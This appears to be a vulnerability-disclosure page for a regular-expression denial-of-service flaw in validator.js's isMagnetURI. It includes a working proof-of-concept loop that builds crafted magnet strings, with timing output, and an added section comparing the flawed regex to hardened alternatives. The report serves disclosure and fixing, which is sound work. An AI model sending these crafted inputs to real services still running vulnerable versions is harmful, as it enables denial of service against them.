Inefficient Regular Expression Complexity in validatorjs/validator.js

Valid

Reported on

Sep 17th 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It makes it possible to cause a denial of service when validating crafted invalid magnet URIs.

The ReDoS vulnerability is mainly due to the sub-pattern .+&tr=.+ , in which two greedy quantifiers are adjacent and overlap (the first .+ can itself consume "&tr=" , so on a failing input the engine retries every split between the two), and it can be exploited with the following code.

Proof of Concept

// PoC.js
// The crafted string has a plausible "magnet:?xt=urn:<type>:<32 chars>" prefix,
// an empty dn, a long run of "&tr=" separators and a trailing CRLF so the
// match can never succeed; the engine then backtracks through every split of
// the two adjacent .+ groups, and the cost grows roughly quadratically.
var validator = require("validator");

for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'magnet:?xt=urn:a:' + 'a'.repeat(32) + '&dn=' + '&tr='.repeat(i * 10000) + "\r\na\r\n";
    validator.isMagnetURI(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

The Output

"attack_str.length: 40058: 464 ms"
"attack_str.length: 80058: 1717 ms"
"attack_str.length: 120058: 3864 ms"
"attack_str.length: 160058: 6871 ms"
"attack_str.length: 200058: 10895 ms"
"attack_str.length: 240058: 15493 ms"
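The following is an added example, not code from this report or from validator.js. It places a regex of the shape the report describes (an assumed reconstruction with the overlapping .+&dn= / .+&tr=.+ adjacency, not the exact line from validator 13.6.x) beside two linear-time ways of validating the same input: a regex in which every quantified piece is fenced by a delimiter it cannot consume, and a check that lets the WHATWG URL parser split the query. The function names, the constructed inputs and the timing helper are illustrative assumptions.

```javascript
// Added example, not code from the report or from validator.js.
// ASSUMPTION: VULNERABLE_MAGNET is a reconstruction in the shape the report
// describes ("&dn=.+&tr=.+"), not the exact line from validator 13.6.x.
const VULNERABLE_MAGNET = /^magnet:\?xt=urn:[a-z0-9]+:[a-z0-9]{32}&dn=.+&tr=.+$/i;

// Hardened regex: every quantified piece is fenced by a delimiter it cannot
// consume ([^&\s] never eats '&' or whitespace), so adjacent quantifiers never
// compete for the same characters and a failed match backtracks a bounded
// amount per parameter. CR/LF anywhere is rejected outright.
const SAFE_MAGNET = /^magnet:\?xt=urn:[a-z0-9]+:[a-z0-9]{32}(?:&[^&=\s]+=[^&\s]*)*$/i;

function isMagnetURIVulnerable(str) {
  return VULNERABLE_MAGNET.test(str);
}

function isMagnetURISafe(str) {
  return SAFE_MAGNET.test(str);
}

// Parser-based alternative: let the WHATWG URL parser split the query and apply
// a small, anchored regex only to the single value being validated.
// Caveat: the URL parser silently strips tab, CR and LF from its input, so the
// whitespace check must run before parsing or the CRLF in the PoC string
// would be accepted.
function isMagnetURIParsed(str) {
  if (typeof str !== 'string' || /\s/.test(str)) return false;
  if (!/^magnet:\?/i.test(str)) return false;
  let url;
  try {
    url = new URL(str);
  } catch (e) {
    return false;
  }
  const xt = url.searchParams.get('xt');
  return xt !== null && /^urn:[a-z0-9]+:[a-z0-9]{32}$/i.test(xt);
}

// Constructed input in the shape of the report's PoC: valid-looking prefix,
// empty dn, n copies of "&tr=", trailing CRLF so no match can ever succeed.
function attackString(n) {
  return 'magnet:?xt=urn:a:' + 'a'.repeat(32) + '&dn=' + '&tr='.repeat(n) + '\r\na\r\n';
}

// Runs one check and returns both its verdict and its wall-clock cost in ms.
function timeCheck(check, str) {
  const start = process.hrtime.bigint();
  const result = check(str);
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  return { result, ms };
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed well-formed input (hypothetical tracker host).
  const valid = 'magnet:?xt=urn:btih:' + 'c'.repeat(32) + '&dn=file.iso&tr=http://tracker.example/announce';
  console.log('valid input:', isMagnetURIVulnerable(valid), isMagnetURISafe(valid), isMagnetURIParsed(valid));
  // Doubling n should roughly quadruple the vulnerable check's cost while the
  // two linear checks stay flat.
  for (const n of [1000, 2000, 4000]) {
    const s = attackString(n);
    const slow = timeCheck(isMagnetURIVulnerable, s);
    const fast = timeCheck(isMagnetURISafe, s);
    const parsed = timeCheck(isMagnetURIParsed, s);
    console.log(`len=${s.length} vulnerable=${slow.ms.toFixed(0)}ms regex=${fast.ms.toFixed(1)}ms parser=${parsed.ms.toFixed(1)}ms`);
  }
}
```

The hardened regex is not a drop-in replacement for the project's semantics (it no longer insists on dn and tr being present); the point it demonstrates is structural: once each repeated group starts with a literal & that neither character class can match, the engine has exactly one way to assign each character and a failing input is rejected in time proportional to its length. The parser-based variant shows the complementary caveat that a URL parser normalises away the very control characters the PoC relies on, so input hygiene has to come first.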
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
Sarhan Aissi validated this vulnerability 2 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sarhan Aissi
2 months ago

Maintainer


Thank you Yeting Li for reporting this ReDoS. A fix has been submitted and is awaiting merge!

Yeting Li
2 months ago

Researcher


Hi Sarhan, thank you for your confirmation. I have also checked that the fixed regex is safe.

Jamie Slome
2 months ago

Admin


Same here! Once we have confirmed the fix, we can go ahead and publish a CVE on your behalf.

Thanks! 🎊

Yeting Li
a month ago

Researcher


Hi @admin, can you assign a CVE?

Jamie Slome
a month ago

Admin


@yetingli - thanks for the comment, we no longer assign CVEs to Inefficient Regular Expression Complexity.

We are doing this for our own internal quality and vetting process on reports before disclosing publicly via CVE.

Sarhan Aissi confirmed that a fix has been merged on 737694 a month ago
The fix bounty has been dropped
isMagnetURI.js#L3 has been validated
Sarhan Aissi
a month ago

Maintainer


Thank you guys! We finally released the fix in validator 13.7.0.